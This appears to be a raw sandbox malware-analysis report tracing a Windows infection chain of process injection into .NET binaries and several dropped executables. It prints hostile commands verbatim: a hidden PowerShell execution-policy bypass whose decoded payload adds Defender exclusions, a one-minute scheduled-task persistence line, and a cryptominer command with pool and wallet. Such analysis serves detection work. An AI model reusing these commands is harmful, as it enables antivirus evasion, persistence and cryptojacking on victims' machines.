Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_0042DB49 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_0042DB49

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001FF099 mov eax, dword ptr fs:[00000030h]	4_2_001FF099
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001FF0DD mov eax, dword ptr fs:[00000030h]	4_2_001FF0DD
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F5760 mov eax, dword ptr fs:[00000030h]	4_2_001F5760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008EF0DD mov eax, dword ptr fs:[00000030h]	7_2_008EF0DD
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E5760 mov eax, dword ptr fs:[00000030h]	7_2_008E5760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008EF099 mov eax, dword ptr fs:[00000030h]	7_2_008EF099
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004380DB mov eax, dword ptr fs:[00000030h]	15_2_004380DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0043BE42 mov eax, dword ptr fs:[00000030h]	15_2_0043BE42

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_00207164 GetProcessHeap,

4_2_00207164

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F0811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_001F0811
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_001F0594
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F3DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_001F3DF3
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F06F7 SetUnhandledExceptionFilter,	4_2_001F06F7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E0811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_008E0811
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_008E0594
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E3DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_008E3DF3
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E06F7 SetUnhandledExceptionFilter,	7_2_008E06F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0043865E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0043865E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041F755 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0041F755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041ED97 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_0041ED97

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Pictures\Illumination.pif	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Pictures\Illumination.pif	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: unknown

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001D4780 CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualAllocEx,GetLastError,VirtualAllocEx,WriteProcessMemory,SetThreadContext,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,ResumeThread,

4_2_001D4780

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\Guid\TypeId.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\jones\AppData\Local\Temp\ -Force; Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\jones\AppData\Roaming\Guid\TypeId.exe

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Thread register set: target process: 4628
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread register set: target process: 416

Writes to foreign memory regions

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 102B008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 4B6000
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: E899D3C010
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E40008
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: C3F9A29010
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 464000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46B000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46C000
Source: C:\Users\user\Pictures\Illumination.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84C008

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe "C:\Users\user\AppData\Local\Temp\1000267001\52i.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe "C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Pictures\Illumination.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Windows" /tr "C:\Users\user\Windows.exe"
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\Pictures\Illumination.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwarwb1agkazabcafqaeqbwaguasqbkac4azqb4agualabdadoaxabxagkabgbkag8adwbzafwatqbpagmacgbvahmabwbmahqalgboaeuavabcaeyacgbhag0azqb3ag8acgbradyanabcahyanaauadaalgazadaamwaxadkaxabbagqazabjag4auabyag8aywblahmacwauaguaeablacwaqwa6afwavqbzaguacgbzafwaagbvag4azqbzafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxaagac0argbvahiaywbladsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaaqwa6afwavwbpag4azabvahcacwbcae0aaqbjahiabwbzag8azgb0ac4atgbfafqaxabgahiayqbtaguadwbvahiaawa2adqaxab2adqalgawac4amwawadmamqa5afwaqqbkagqasqbuafaacgbvagmazqbzahmalgblahgazqasaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwarwb1agkazabcafqaeqbwaguasqbkac4azqb4agua

Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001EFC33 cpuid

4_2_001EFC33

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: EnumSystemLocalesW,	4_2_001FC03B
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: EnumSystemLocalesW,	4_2_00206843
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: EnumSystemLocalesW,	4_2_0020688E
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: EnumSystemLocalesW,	4_2_00206929
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_002069B4
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: GetLocaleInfoW,	4_2_00206C07
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00206D2D
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: GetLocaleInfoW,	4_2_001FC59D
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: GetLocaleInfoW,	4_2_00206E33
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00206F02
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	7_2_008F688E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	7_2_008EC03B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	7_2_008F6843
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_008F69B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	7_2_008F6929
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	7_2_008F6C07
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	7_2_008EC59D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_008F6D2D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	7_2_008F6E33
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_008F6F02

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Users\user\Desktop\trSK2fqPeB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
